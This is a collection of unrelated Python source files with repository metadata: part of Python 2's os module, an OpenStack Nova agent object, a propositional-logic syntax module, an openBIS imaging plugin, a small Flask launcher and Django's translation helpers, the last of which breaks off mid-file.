SEEK_CUR = 1
SEEK_END = 2
#'
# Super directory utilities.
# (Inspired by Eric Raymond; the doc strings are mostly his)
def makedirs(name, mode=0777):
"""makedirs(path [, mode=0777])
Super-mkdir; create a leaf directory and all intermediate ones.
Works like mkdir, except that any intermediate path segment (not
just the rightmost) will be created if it does not exist. This is
recursive.
"""
head, tail = path.split(name)
if not tail:
head, tail = path.split(head)
if head and tail and not path.exists(head):
try:
makedirs(head, mode)
except OSError, e:
# be happy if someone already created the path
if e.errno != errno.EEXIST:
raise
if tail == curdir: # xxx/newdir/. exists if xxx/newdir exists
return
mkdir(name, mode)
def removedirs(name):
"""removedirs(path)
Super-rmdir; remove a leaf directory and all empty intermediate
ones. Works like rmdir except that, if the leaf directory is
successfully removed, directories corresponding to rightmost path
segments will be pruned away until either the whole path is
consumed or an error occurs. Errors during this latter phase are
ignored -- they generally mean that a directory was not empty.
"""
rmdir(name)
head, tail = path.split(name)
if not tail:
head, tail = path.split(head)
while head and tail:
try:
rmdir(head)
except error:
break
head, tail = path.split(head)
def renames(old, new):
"""renames(old, new)
Super-rename; create directories as necessary and delete any left
empty. Works like rename, except creation of any intermediate
directories needed to make the new pathname good is attempted
first. After the rename, directories corresponding to rightmost
path segments of the old name will be pruned way until either the
whole path is consumed or a nonempty directory is found.
Note: this function can fail with the new directory structure made
if you lack permissions needed to unlink the leaf directory or
file.
"""
head, tail = path.split(new)
if head and tail and not path.exists(head):
makedirs(head)
rename(old, new)
head, tail = path.split(old)
if head and tail:
try:
removedirs(head)
except error:
pass
__all__.extend(["makedirs", "removedirs", "renames"])
def walk(top, topdown=True, onerror=None, followlinks=False):
"""Directory tree generator.
For each directory in the directory tree rooted at top (including top
itself, but excluding '.' and '..'), yields a 3-tuple
dirpath, dirnames, filenames
dirpath is a string, the path to the directory. dirnames is a list of
the names of the subdirectories in dirpath (excluding '.' and '..').
filenames is a list of the names of the non-directory files in dirpath.
Note that the names in the lists are just names, with no path components.
To get a full path (which begins with top) to a file or directory in
dirpath, do os.path.join(dirpath, name).
If optional arg 'topdown' is true or not specified, the triple for a
directory is generated before the triples for any of its subdirectories
(directories are generated top down). If topdown is false, the triple
for a directory is generated after the triples for all of its
subdirectories (directories are generated bottom up).
When topdown is true, the caller can modify the dirnames list in-place
(e.g., via del or slice assignment), and walk will only recurse into the
subdirectories whose names remain in dirnames; this can be used to prune
the search, or to impose a specific order of visiting. Modifying
dirnames when topdown is false is ineffective, since the directories in
dirnames have already been generated by the time dirnames itself is
generated.
By default errors from the os.listdir() call are ignored. If
optional arg 'onerror' is specified, it should be a function; it
will be called with one argument, an os.error instance. It can
report the error to continue with the walk, or raise the exception
to abort the walk. Note that the filename is available as the
filename attribute of the exception object.
By default, os.walk does not follow symbolic links to subdirectories on
systems that support them. In order to get this functionality, set the
optional argument 'followlinks' to true.
Caution: if you pass a relative pathname for top, don't change the
current working directory between resumptions of walk. walk never
changes the current directory, and assumes that the client doesn't
either.
Example:
import os
from os.path import join, getsize
for root, dirs, files in os.walk('python/Lib/email'):
print root, "consumes",
print sum([getsize(join(root, name)) for name in files]),
print "bytes in", len(files), "non-directory files"
if 'CVS' in dirs:
dirs.remove('CVS') # don't visit CVS directories
"""
from os.path import join, isdir, islink
# We may not have read permission for top, in which case we can't
# get a list of the files the directory contains. os.path.walk
# always suppressed the exception then, rather than blow up for a
# minor reason when (say) a thousand readable directories are still
# left to visit. That logic is copied here.
try:
# Note that listdir and error are globals in this module due
# to earlier import-*.
names = listdir(top)
except error, err:
if onerror is not None:
onerror(err)
return
dirs, nondirs = [], []
for name in names:
if isdir(join(top, name)):
dirs.append(name)
else:
nondirs.append(name)
if topdown:
yield top, dirs, nondirs
for name in dirs:
path = join(top, name)
if followlinks or not islink(path):
for x in walk(path, topdown, onerror, followlinks):
yield x
if not topdown:
yield top, dirs, nondirs
__all__.append("walk")
# Make sure os.environ exists, at least
try:
environ
except NameError:
environ = {}
def execl(file, *args):
"""execl(file, *args)
Execute the executable file with argument list args, replacing the
current process. """
execv(file, args)
def execle(file, *args):
"""execle(file, *args, env)
Execute the executable file with argument list args and
environment env, replacing the current process. """
env = args[-1]
execve(file, args[:-1], env)
def execlp(file, *args):
"""execlp(file, *args)
Execute the executable file (which is searched for along $PATH)
with argument list args, replacing the current process. """
execvp(file, args)
def execlpe(file, *args):
"""execlpe(file, *args, env)
Execute the executable file (which is searched for along $PATH)
with argument list args and environment env, replacing the current
process. """
env = args[-1]
execvpe(file, args[:-1], env)
def execvp(file, args):
"""execp(file, args)
Execute the executable file (which is searched for along $PATH)
with argument list args, replacing the current process.
args may be a list or tuple of strings. """
_execvpe(file, args)
def execvpe(file, args, env):
"""execvpe(file, args, env)
Execute the executable file (which is searched for along $PATH)
with argument list args and environment env , replacing the
current process.
args may be a list or tuple of strings. """
_execvpe(file, args, env)
__all__.extend(["execl","execle","execlp","execlpe","execvp","execvpe"])
def _execvpe(file, args, env=None):
if env is not None:
func = execve
argrest = (args, env)
else:
func = execv
argrest = (args,)
env = environ
head, tail = path.split(file)
if head:
func(file, *argrest)
return
if 'PATH' in env:
envpath = env['PATH']
else:
envpath = defpath
PATH = envpath.split(pathsep)
saved_exc = None
saved_tb = None
for dir in PATH:
fullname = path.join(dir, file)
try:
func(fullname, *argrest)
except error, e:
tb = sys.exc_info()[2]
if (e.errno != errno.ENOENT and e.errno != errno.ENOTDIR
and saved_exc is None):
saved_exc = e
saved_tb = tb
if saved_exc:
raise error, saved_exc, saved_tb
raise error, e, tb
# Change environ to automatically call putenv() if it exists
try:
# This will fail if there's no putenv
putenv
except NameError:
pass
else:
import UserDict
# Fake unsetenv() for Windows
# not sure about os2 here but
# I'm guessing they are the same.
if name in ('os2', 'nt'):
def unsetenv(key):
putenv(key, "")
if name == "riscos":
# On RISC OS, all env access goes through getenv and putenv
from riscosenviron import _Environ
elif name in ('os2', 'nt'): # Where Env Var Names Must Be UPPERCASE
# But we store them as upper case
class _Environ(UserDict.IterableUserDict):
def __init__(self, environ):
UserDict.UserDict.__init__(self)
data = self.data
for k, v in environ.items():
data[k.upper()] = v
def __setitem__(self, key, item):
putenv(key, item)
self.data[key.upper()] = item
def __getitem__(self, key):
return self.data[key.upper()]
try:
unsetenv
except NameError:
def __delitem__(self, key):
del self.data[key.upper()]
else:
def __delitem__(self, key):
unsetenv(key)
del self.data[key.upper()]
def clear(self):
for key in self.data.keys():
unsetenv(key)
del self.data[key]
def pop(self, key, *args):
unsetenv(key)
return self.data.pop(key.upper(), *args)
def has_key(self, key):
return key.upper() in self.data
def __contains__(self, key):
return key.upper() in self.data
def get(self, key, failobj=None):
return self.data.get(key.upper(), failobj)
def update(self, dict=None, **kwargs):
if dict:
try:
keys = dict.keys()
except AttributeError:
# List of (key, value)
for k, v in dict:
self[k] = v
else:
# got keys
# cannot use items(), since mappings
# may not have them.
for k in keys:
self[k] = dict[k]
if kwargs:
self.update(kwargs)
def copy(self):
return dict(self)
else: # Where Env Var Names Can Be Mixed Case
class _Environ(UserDict.IterableUserDict):
def __init__(self, environ):
UserDict.UserDict.__init__(self)
self.data = environ
def __setitem__(self, key, item):
putenv(key, item)
self.data[key] = item
def update(self, dict=None, **kwargs):
if dict:
try:
keys = dict.keys()
except AttributeError:
# List of (key, value)
for k, v in dict:
self[k] = v
else:
# got keys
# cannot use items(), since mappings
# may not have them.
for k in keys:
self[k] = dict[k]
if kwargs:
self.update(kwargs)
try:
unsetenv
except NameError:
pass
else:
def __delitem__(self, key):
unsetenv(key)
del self.data[key]
def clear(self):
for key in self.data.keys():
unsetenv(key)
del self.data[key]
def pop(self, key, *args):
unsetenv(key)
return self.data.pop(key, *args)
def copy(self):
return dict(self)
environ = _Environ(environ)
def getenv(key, default=None):
"""Get an environment variable, return None if it doesn't exist.
The optional second argument can specify an alternate default."""
return environ.get(key, default)
__all__.append("getenv")
def _exists(name):
try:
eval(name)
return True
except NameError:
return False
# Supply spawn*() (probably only for Unix)
if _exists("fork") and not _exists("spawnv") and _exists("execv"):
P_WAIT = 0
P_NOWAIT = P_NOWAITO = 1
# XXX Should we support P_DETACH? I suppose it could fork()**2
# and close the std I/O streams. Also, P_OVERLAY is the same
# as execv*()?
def _spawnvef(mode, file, args, env, func):
# Internal helper; func is the exec*() function to use
pid = fork()
if not pid:
# Child
try:
if env is None:
func(file, args)
else:
func(file, args, env)
except:
_exit(127)
else:
# Parent
if mode == P_NOWAIT:
return pid # Caller is responsible for waiting!
while 1:
wpid, sts = waitpid(pid, 0)
if WIFSTOPPED(sts):
continue
elif WIFSIGNALED(sts):
return -WTERMSIG(sts)
elif WIFEXITED(sts):
return WEXITSTATUS(sts)
else:
raise error, "Not stopped, signaled or exited???"
def spawnv(mode, file, args):
"""spawnv(mode, file, args) -> integer
Execute file with arguments from args in a subprocess.
If mode == P_NOWAIT return the pid of the process.
If mode == P_WAIT return the process's exit code if it exits normally;
otherwise return -SIG, where SIG is the signal that killed it. """
return _spawnvef(mode, file, args, None, execv)
def spawnve(mode, file, args, env):
"""spawnve(mode, file, args, env) -> integer
Execute file with arguments from args in a subprocess with the
specified environment.
If mode == P_NOWAIT return the pid of the process.
If mode == P_WAIT return the process's exit code if it exits normally;
otherwise return -SIG, where SIG is the signal that killed it. """
return _spawnvef(mode, file, args, env, execve)
# Note: spawnvp[e] is't currently supported on Windows
def spawnvp(mode, file, args):
"""spawnvp(mode, file, args) -> integer
Execute file (which is looked for along $PATH) with arguments from
args in a subprocess.
If mode == P_NOWAIT return the pid of the process.
If mode == P_WAIT return the process's exit code if it exits normally;
otherwise return -SIG, where SIG is the signal that killed it. """
return _spawnvef(mode, file, args, None, execvp)
def spawnvpe(mode, file, args, env):
"""spawnvpe(mode, file, args, env) -> integer
Execute file (which is looked for along $PATH) with arguments from
args in a subprocess with the supplied environment.
If mode == P_NOWAIT return the pid of the process.
If mode == P_WAIT return the process's exit code if it exits normally;
otherwise return -SIG, where SIG is the signal that killed it. """
return _spawnvef(mode, file, args, env, execvpe)
if _exists("spawnv"):
# These aren't supplied by the basic Windows code
# but can be easily implemented in Python
def spawnl(mode, file, *args):
"""spawnl(mode, file, *args) -> integer
Execute file with arguments from args in a subprocess.
If mode == P_NOWAIT return the pid of the process.
If mode == P_WAIT return the process's exit code if it exits normally;
otherwise return -SIG, where SIG is the signal that killed it. """
return spawnv(mode, file, args)
def spawnle(mode, file, *args):
"""spawnle(mode, file, *args, env) -> integer
Execute file with arguments from args in a subprocess with the
supplied environment.
If mode == P_NOWAIT return the pid of the process.
If mode == P_WAIT return the process's exit code if it exits normally;
otherwise return -SIG, where SIG is the signal that killed it. """
env = args[-1]
return spawnve(mode, file, args[:-1], env)
__all__.extend(["spawnv", "spawnve", "spawnl", "spawnle",])
if _exists("spawnvp"):
# At the moment, Windows doesn't implement spawnvp[e],
# so it won't have spawnlp[e] either.
def spawnlp(mode, file, *args):
"""spawnlp(mode, file, *args) -> integer
Execute file (which is looked for along $PATH) with arguments from
args in a subprocess with the supplied environment.
If mode == P_NOWAIT return the pid of the process.
If mode == P_WAIT return the process's exit code if it exits normally;
otherwise return -SIG, where SIG is the signal that killed it. """
return spawnvp(mode, file, args)
def spawnlpe(mode, file, *args):
"""spawnlpe(mode, file, *args, env) -> integer
Execute file (which is looked for along $PATH) with arguments from
args in a subprocess with the supplied environment.
If mode == P_NOWAIT return the pid of the process.
If mode == P_WAIT return the process's exit code if it exits normally;
otherwise return -SIG, where SIG is the signal that killed it. """
env = args[-1]
return spawnvpe(mode, file, args[:-1], env)
__all__.extend(["spawnvp", "spawnvpe", "spawnlp", "spawnlpe",])
# Supply popen2 etc. (for Unix)
if _exists("fork"):
if not _exists("popen2"):
def popen2(cmd, mode="t", bufsize=-1):
"""Execute the shell command 'cmd' in a sub-process. On UNIX, 'cmd'
may be a sequence, in which case arguments will be passed directly to
the program without shell intervention (as with os.spawnv()). If 'cmd'
is a string it will be passed to the shell (as with os.system()). If
'bufsize' is specified, it sets the buffer size for the I/O pipes. The
file objects (child_stdin, child_stdout) are returned."""
import warnings
msg = "os.popen2 is deprecated. Use the subprocess module."
warnings.warn(msg, DeprecationWarning, stacklevel=2)
import subprocess
PIPE = subprocess.PIPE
p = subprocess.Popen(cmd, shell=isinstance(cmd, basestring),
bufsize=bufsize, stdin=PIPE, stdout=PIPE,
close_fds=True)
return p.stdin, p.stdout
__all__.append("popen2")
if not _exists("popen3"):
def popen3(cmd, mode="t", bufsize=-1):
"""Execute the shell command 'cmd' in a sub-process. On UNIX, 'cmd'
may be a sequence, in which case arguments will be passed directly to
the program without shell intervention (as with os.spawnv()). If 'cmd'
is a string it will be passed to the shell (as with os.system()). If
'bufsize' is specified, it sets the buffer size for the I/O pipes. The
file objects (child_stdin, child_stdout, child_stderr) are returned."""
import warnings
msg = "os.popen3 is deprecated. Use the subprocess module."
warnings.warn(msg, DeprecationWarning, stacklevel=2)
import subprocess
PIPE = subprocess.PIPE
p = subprocess.Popen(cmd, shell=isinstance(cmd, basestring),
bufsize=bufsize, stdin=PIPE, stdout=PIPE,
stderr=PIPE, close_fds=True)
return p.stdin, p.stdout, p.stderr
__all__.append("popen3")
if not _exists("popen4"):
def popen4(cmd, mode="t", bufsize=-1):
"""Execute the shell command 'cmd' in a sub-process. On UNIX, 'cmd'
may be a sequence, in which case arguments will be passed directly to
the program without shell intervention (as with os.spawnv()). If 'cmd'
is a string it will be passed to the shell (as with os.system()). If
'bufsize' is specified, it sets the buffer size for the I/O pipes. The
file objects (child_stdin, child_stdout_stderr) are returned."""
import warnings
msg = "os.popen4 is deprecated. Use the subprocess module."
warnings.warn(msg, DeprecationWarning, stacklevel=2)
import subprocess
PIPE = subprocess.PIPE
p = subprocess.Popen(cmd, shell=isinstance(cmd, basestring),
bufsize=bufsize, stdin=PIPE, stdout=PIPE,
stderr=subprocess.STDOUT, close_fds=True)
return p.stdin, p.stdout
__all__.append("popen4")
import copy_reg as _copy_reg
def _make_stat_result(tup, dict):
return stat_result(tup, dict)
def _pickle_stat_result(sr):
(type, args) = sr.__reduce__()
return (_make_stat_result, args)
try:
_copy_reg.pickle(stat_result, _pickle_stat_result, _make_stat_result)
except NameError: # stat_result may not exist
pass
def _make_statvfs_result(tup, dict):
return statvfs_result(tup, dict)
def _pickle_statvfs_result(sr):
(type, args) = sr.__reduce__()
return (_make_statvfs_result, args)
try:
_copy_reg.pickle(statvfs_result, _pickle_statvfs_result,
_make_statvfs_result)
except NameError: # statvfs_result may not exist
pass
if not _exists("urandom"):
def urandom(n):
"""urandom(n) -> str
Return a string of n random bytes suitable for cryptographic use.
"""
try:
_urandomfd = open("/dev/urandom", O_RDONLY)
except (OSError, IOError):
raise NotImplementedError("/dev/urandom (or equivalent) not found")
try:
bs = b""
while n - len(bs) >= 1:
bs += read(_urandomfd, n - len(bs))
finally:
close(_urandomfd)
return bs
|
MicroTrustRepos/microkernel
|
src/l4/pkg/python/contrib/Lib/os.py
|
Python
|
gpl-2.0
| 26,337
| 0.003038
|
# Copyright 2014 Red Hat, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import db
from nova import exception
from nova import objects
from nova.objects import base
from nova.objects import fields
class Agent(base.NovaPersistentObject, base.NovaObject):
VERSION = '1.0'
fields = {
'id': fields.IntegerField(read_only=True),
'hypervisor': fields.StringField(),
'os': fields.StringField(),
'architecture': fields.StringField(),
'version': fields.StringField(),
'url': fields.StringField(),
'md5hash': fields.StringField(),
}
@staticmethod
def _from_db_object(context, agent, db_agent):
for name in agent.fields:
agent[name] = db_agent[name]
agent._context = context
agent.obj_reset_changes()
return agent
@base.remotable_classmethod
def get_by_triple(cls, context, hypervisor, os, architecture):
db_agent = db.agent_build_get_by_triple(context, hypervisor,
os, architecture)
if not db_agent:
return None
return cls._from_db_object(context, objects.Agent(), db_agent)
@base.remotable
def create(self, context):
updates = self.obj_get_changes()
if 'id' in updates:
raise exception.ObjectActionError(action='create',
reason='Already Created')
db_agent = db.agent_build_create(context, updates)
self._from_db_object(context, self, db_agent)
@base.remotable
def destroy(self, context):
db.agent_build_destroy(context, self.id)
@base.remotable
def save(self, context):
updates = self.obj_get_changes()
db.agent_build_update(context, self.id, updates)
self.obj_reset_changes()
class AgentList(base.ObjectListBase, base.NovaObject):
VERSION = '1.0'
fields = {
'objects': fields.ListOfObjectsField('Agent'),
}
child_versions = {
'1.0': '1.0',
}
@base.remotable_classmethod
def get_all(cls, context, hypervisor=None):
db_agents = db.agent_build_get_all(context, hypervisor=hypervisor)
return base.obj_make_list(context, cls(), objects.Agent, db_agents)
|
ChinaMassClouds/copenstack-server
|
openstack/src/nova-2014.2/nova/objects/agent.py
|
Python
|
gpl-2.0
| 2,828
| 0
|
"""Describe the language syntax."""
import re
class Symbol:
"""Describes the language symbols."""
# General pattern of formulas
pattern = '([a-z0-9&\-\|><\(\)]*)'
accepted_chars = '([a-z0-9&\-\|><\(\)]*)'
def __init__(self, value):
"""Init a propositional symbol."""
self.value = value
@classmethod
def check(cls, symbol):
"""Check if the given arg is a symbol."""
regexp = re.compile(r'^%s$' % cls.pattern)
return regexp.match(symbol)
@classmethod
def accepts_initial_char(cls, char):
"""Check if the operator accepts the given char as initial char."""
regexp = re.compile(r'^%s$' % cls.accepted_initial_char)
return regexp.match(char)
def is_a(self, cls):
"""Check if this token is a given type."""
return isinstance(self, cls)
def __str__(self):
"""Return the symbol value as str."""
return self.value
class PropositionalSymbol(Symbol):
"""
Describes the propositional symbols of the language.
The propositional symbols are represented by any
lowercase letter, followed or not by an integer index.
Examples:
p, p1, q23, r1890
"""
accepted_initial_char = '[a-z]'
pattern = '([a-z]{1}[0-9]*)'
def subformulas(self):
"""
Get the formula subformulas.
Return itself as it is a propositional symbol.
"""
return [self]
def str_representation(self):
"""String representation of the symbol."""
return self.value
def evaluate(self, symbol_values):
"""Evaluate symbol with given values."""
return symbol_values[self.str_representation()]
def count_terms(self):
"""Count the terms of the formula."""
return 1
class PontuationSymbol(Symbol):
"""
Describes the pontuation symbols of the language.
The pontuation symbols are represented by the
opening and closing parenthesis.
"""
pattern = '([\(\)])'
class OpeningParenthesis(PontuationSymbol):
"""Describes the opening parenthesis."""
accepted_initial_char = '\('
pattern = '\('
class ClosingParenthesis(PontuationSymbol):
"""Describes the closing parenthesis."""
accepted_initial_char = '\)'
pattern = '\)'
class Operator(Symbol):
"""Base class for language operators."""
class Associativity:
"""Possible operators associativity."""
LEFT = 1
RIGHT = 0
def subformulas(self):
"""Get the formula subformulas."""
raise NotImplementedError
def evaluate(self, symbol_values):
"""Evaluate an operator with given values."""
raise NotImplementedError
def __str__(self):
"""Return the string representation as str."""
return self.str_representation()
class BinaryOperator(Operator):
"""Describe binary operators."""
def set_args(self, arg1, arg2):
"""Set the operator args."""
self.arg1 = arg1
self.arg2 = arg2
def subformulas(self):
"""
Get the formula subformulas.
Return itself and the subformulas of its first and second args.
"""
return self.arg1.subformulas() + self.arg2.subformulas() + [self]
def str_representation(self):
"""String representation of the formula."""
if self.arg1.is_a(PropositionalSymbol) or (
self.arg1.is_a(Operator) and
self.precendence <= self.arg1.precendence
):
# In this case do not need parenthesis
arg1_repr = self.arg1.str_representation()
else:
arg1_repr = '(' + self.arg1.str_representation() + ')'
if self.arg2.is_a(PropositionalSymbol) or (
self.arg2.is_a(Operator) and
self.precendence <= self.arg2.precendence
):
arg2_repr = self.arg2.str_representation()
else:
arg2_repr = '(' + self.arg2.str_representation() + ')'
return arg1_repr + self.SYMBOL + arg2_repr
def count_terms(self):
"""Count the terms of the formula."""
return 1 + self.arg1.count_terms() + self.arg2.count_terms()
class UnaryOperator(Operator):
"""Describe unary operators."""
def set_arg(self, arg):
"""Set the operator arg."""
self.arg1 = arg
def subformulas(self):
"""
Get the formula subformulas.
Return itself and the subformulas of its arg.
"""
return self.arg1.subformulas() + [self]
def str_representation(self):
"""String representation of the formula."""
if self.arg1.is_a(PropositionalSymbol):
return self.SYMBOL + self.arg1.str_representation()
else:
return self.SYMBOL + '(' + self.arg1.str_representation() + ')'
def count_terms(self):
"""Count the terms of the formula."""
return 1 + self.arg1.count_terms()
class Negation(UnaryOperator):
"""Describe the negation operator."""
SYMBOL = '-'
accepted_initial_char = '\-'
pattern = '\-'
precendence = 6
associativity = Operator.Associativity.RIGHT
def evaluate(self, symbol_values):
"""Evaluate a negation with given values."""
return not self.arg1.evaluate(symbol_values)
class Conjunction(BinaryOperator):
"""Describe the conjunction operator."""
SYMBOL = '&'
accepted_initial_char = '&'
pattern = '&'
precendence = 5
associativity = Operator.Associativity.LEFT
def evaluate(self, symbol_values):
"""Evaluate a conjunction with given values."""
return (self.arg1.evaluate(symbol_values) and
self.arg2.evaluate(symbol_values))
class Disjunction(BinaryOperator):
"""Describe the disjunction operator."""
SYMBOL = '|'
accepted_initial_char = '\|'
pattern = '\|'
precendence = 4
associativity = Operator.Associativity.LEFT
def evaluate(self, symbol_values):
"""Evaluate a disjunction with given values."""
return (self.arg1.evaluate(symbol_values) or
self.arg2.evaluate(symbol_values))
class Implication(BinaryOperator):
"""Describe the implication operator."""
SYMBOL = '->'
accepted_initial_char = '\-'
pattern = '\->'
precendence = 3
associativity = Operator.Associativity.LEFT
def evaluate(self, symbol_values):
"""
Evaluate an implication with given values.
To do the trick: p -> q = -p | q
"""
return (not self.arg1.evaluate(symbol_values) or
self.arg2.evaluate(symbol_values))
class BiImplication(BinaryOperator):
"""Describe the bi-implication operator."""
SYMBOL = '<->'
accepted_initial_char = '<'
pattern = '<\->'
precendence = 2
associativity = Operator.Associativity.LEFT
def evaluate(self, symbol_values):
"""
Evaluate a bi-implication with given values.
To do the trick: p <-> q = (p -> q) & (q -> p) = (-p | q) & (-q | p)
"""
return (
not self.arg1.evaluate(symbol_values) or
self.arg2.evaluate(symbol_values)
) and (
not self.arg2.evaluate(symbol_values) or
self.arg1.evaluate(symbol_values)
)
|
italopaiva/propositional-logic
|
lp/syntax.py
|
Python
|
mit
| 7,307
| 0.002874
|
# -*- coding: utf-8 -*-
'''
Created on Apr 27, 2016
@author: Aaron Ponti
'''
from ch.systemsx.cisd.openbis.dss.etl.dto.api.impl import MaximumIntensityProjectionGenerationAlgorithm
class GenericTIFFSeriesMaximumIntensityProjectionGenerationAlgorithm(MaximumIntensityProjectionGenerationAlgorithm):
'''
Custom MaximumIntensityProjectionGenerationAlgorithm for Generic TIFF Series
that makes sure that the first timepoint in a series is registered for
creation of the representative thumbnail.
'''
def __init__(self, datasetTypeCode, width, height, filename):
"""
Constructor
"""
# Call the parent base constructor
MaximumIntensityProjectionGenerationAlgorithm.__init__(self,
datasetTypeCode, width, height, filename)
def imageToBeIgnored(self, image):
"""
Overrides the parent imageToBeIgnored method. The selection of which
series should be used to create the representative thumbnail is done
in GenericTIFFSeriesCompositeDatasetConfig. Here we prevent the base
MaximumIntensityProjectionGenerationAlgorithm.imageToBeIgnored() method
to make a decision based on the timepoint (== 0), since we cannot know
which is the first time point in a Generic TIFF Series.
"""
return False
|
aarpon/obit_microscopy_core_technology
|
core-plugins/microscopy/3/dss/drop-boxes/MicroscopyDropbox/GenericTIFFSeriesMaximumIntensityProjectionGenerationAlgorithm.py
|
Python
|
apache-2.0
| 1,343
| 0.005957
|
'''
Created on 17/2/2015
@author: PC06
Primer cambio en el proyecto
'''
from include import app
if __name__ == '__main__':
app.run("127.0.0.1", 9000, debug=True)
|
javiteri/reposdmpdos
|
miltonvz/run.py
|
Python
|
gpl-2.0
| 176
| 0.005682
|
"""Translation helper functions."""
import locale
import os
import re
import sys
import gettext as gettext_module
from cStringIO import StringIO
from django.utils.importlib import import_module
from django.utils.safestring import mark_safe, SafeData
from django.utils.thread_support import currentThread
# Translations are cached in a dictionary for every language+app tuple.
# The active translations are stored by threadid to make them thread local.
_translations = {}
_active = {}
# The default translation is based on the settings file.
_default = None
# This is a cache for normalized accept-header languages to prevent multiple
# file lookups when checking the same locale on repeated requests.
_accepted = {}
# Format of Accept-Language header values. From RFC 2616, section 14.4 and 3.9.
accept_language_re = re.compile(r'''
([A-Za-z]{1,8}(?:-[A-Za-z]{1,8})*|\*) # "en", "en-au", "x-y-z", "*"
(?:;q=(0(?:\.\d{,3})?|1(?:.0{,3})?))? # Optional "q=1.00", "q=0.8"
(?:\s*,\s*|$) # Multiple accepts per header.
''', re.VERBOSE)
def to_locale(language, to_lower=False):
"""
Turns a language name (en-us) into a locale name (en_US). If 'to_lower' is
True, the last component is lower-cased (en_us).
"""
p = language.find('-')
if p >= 0:
if to_lower:
return language[:p].lower()+'_'+language[p+1:].lower()
else:
return language[:p].lower()+'_'+language[p+1:].upper()
else:
return language.lower()
def to_language(locale):
"""Turns a locale name (en_US) into a language name (en-us)."""
p = locale.find('_')
if p >= 0:
return locale[:p].lower()+'-'+locale[p+1:].lower()
else:
return locale.lower()
class DjangoTranslation(gettext_module.GNUTranslations):
"""
This class sets up the GNUTranslations context with regard to output
charset. Django uses a defined DEFAULT_CHARSET as the output charset on
Python 2.4. With Python 2.3, use DjangoTranslation23.
"""
def __init__(self, *args, **kw):
from django.conf import settings
gettext_module.GNUTranslations.__init__(self, *args, **kw)
# Starting with Python 2.4, there's a function to define
# the output charset. Before 2.4, the output charset is
# identical with the translation file charset.
try:
self.set_output_charset('utf-8')
except AttributeError:
pass
self.django_output_charset = 'utf-8'
self.__language = '??'
def merge(self, other):
self._catalog.update(other._catalog)
def set_language(self, language):
self.__language = language
def language(self):
return self.__language
def __repr__(self):
return "<DjangoTranslation lang:%s>" % self.__language
class DjangoTranslation23(DjangoTranslation):
"""
Compatibility class that is only used with Python 2.3.
Python 2.3 doesn't support set_output_charset on translation objects and
needs this wrapper class to make sure input charsets from translation files
are correctly translated to output charsets.
With a full switch to Python 2.4, this can be removed from the source.
"""
def gettext(self, msgid):
res = self.ugettext(msgid)
return res.encode(self.django_output_charset)
def ngettext(self, msgid1, msgid2, n):
res = self.ungettext(msgid1, msgid2, n)
return res.encode(self.django_output_charset)
def translation(language):
"""
Returns a translation object.
This translation object will be constructed out of multiple GNUTranslations
objects by merging their catalogs. It will construct a object for the
requested language and add a fallback to the default language, if it's
different from the requested language.
"""
global _translations
t = _translations.get(language, None)
if t is not None:
return t
from django.conf import settings
# set up the right translation class
klass = DjangoTranslation
if sys.version_info < (2, 4):
klass = DjangoTranslation23
globalpath = os.path.join(os.path.dirname(sys.modules[settings.__module__].__file__), 'locale')
if settings.SETTINGS_MODULE is not None:
parts = settings.SETTINGS_MODULE.split('.')
project = import_module(parts[0])
projectpath = os.path.join(os.path.dirname(project.__file__), 'locale')
else:
projectpath = None
def _fetch(lang, fallback=None):
global _translations
loc = to_locale(lang)
res = _translations.get(lang, None)
if res is not None:
return res
def _translation(path):
try:
t = gettext_module.translation('django', path, [loc], klass)
t.set_language(lang)
return t
except IOError, e:
return None
res = _translation(globalpath)
# We want to ensure that, for example, "en-gb" and "en-us" don't share
# the same translation object (thus, merging en-us with a local update
# doesn't affect en-gb), even though they will both use the core "en"
# translation. So we have to subvert Python's internal gettext caching.
base_lang = lambda x: x.split('-', 1)[0]
if base_lang(lang) in [base_lang(trans) for trans in _translations]:
res._info = res._info.copy()
res._catalog = res._catalog.copy()
def _merge(path):
t = _translation(path)
if t is not None:
if res is None:
return t
else:
res.merge(t)
return res
for localepath in settings.LOCALE_PATHS:
if os.path.isdir(localepath):
res = _merge(localepath)
if projectpath and os.path.isdir(projectpath):
res = _merge(projectpath)
for appname in settings.INSTALLED_APPS:
app = import_module(appname)
apppath = os.path.join(os.path.dirname(app.__file__), 'locale')
if os.path.isdir(apppath):
res = _merge(apppath)
if res is None:
if fallback is not None:
res = fallback
else:
return gettext_module.NullTranslations()
_translations[lang] = res
return res
default_translation = _fetch(settings.LANGUAGE_CODE)
current_translation = _fetch(language, fallback=default_translation)
return current_translation
def activate(language):
"""
Fetches the translation object for a given tuple of application name and
language and installs it as the current translation object for the current
thread.
"""
_active[currentThread()] = translation(language)
def deactivate():
"""
Deinstalls the currently active translation object so that further _ calls
will resolve against the default translation object, again.
"""
global _active
if currentThread() in _active:
del _active[currentThread()]
def deactivate_all():
"""
Makes the active translation object a NullTranslations() instance. This is
useful when we want delayed translations to appear as the original string
for some reason.
"""
_active[currentThread()] = gettext_module.NullTranslations()
def get_language():
"""Returns the currently selected language."""
t = _active.get(currentThread(), None)
if t is not None:
try:
return to_language(t.language())
except AttributeError:
pass
# If we don't have a real translation object, assume it's the default language.
from django.conf import settings
return settings.LANGUAGE_CODE
def get_language_bidi():
"""
Returns selected language's BiDi layout.
False = left-to-right layout
True = right-to-left layout
"""
from django.conf import settings
base_lang = get_language().split('-')[0]
return base_lang in settings.LANGUAGES_BIDI
def catalog():
"""
Returns the current active catalog for further processing.
This can be used if you need to modify the catalog or want to access the
whole message catalog instead of just translating one string.
"""
global _default, _active
t = _active.get(currentThread(), None)
if t is not None:
return t
if _default is None:
from django.conf import settings
_default = translation(settings.LANGUAGE_CODE)
return _default
def do_translate(message, translation_function):
"""
Translates 'message' using the given 'translation_function' name -- which
will be either gettext or ugettext. It uses the current thread to find the
translation object to use. If no current translation is activated, the
message will be run through the default translation object.
"""
global _default, _active
t = _active.get(currentThread(), None)
if t is not None:
result = getattr(t, translation_function)(message)
else:
if _default is None:
from django.conf import settings
_default = translation(settings.LANGUAGE_CODE)
result = getattr(_default, translation_function)(message)
if isinstance(message, SafeData):
return mark_safe(result)
return result
def gettext(message):
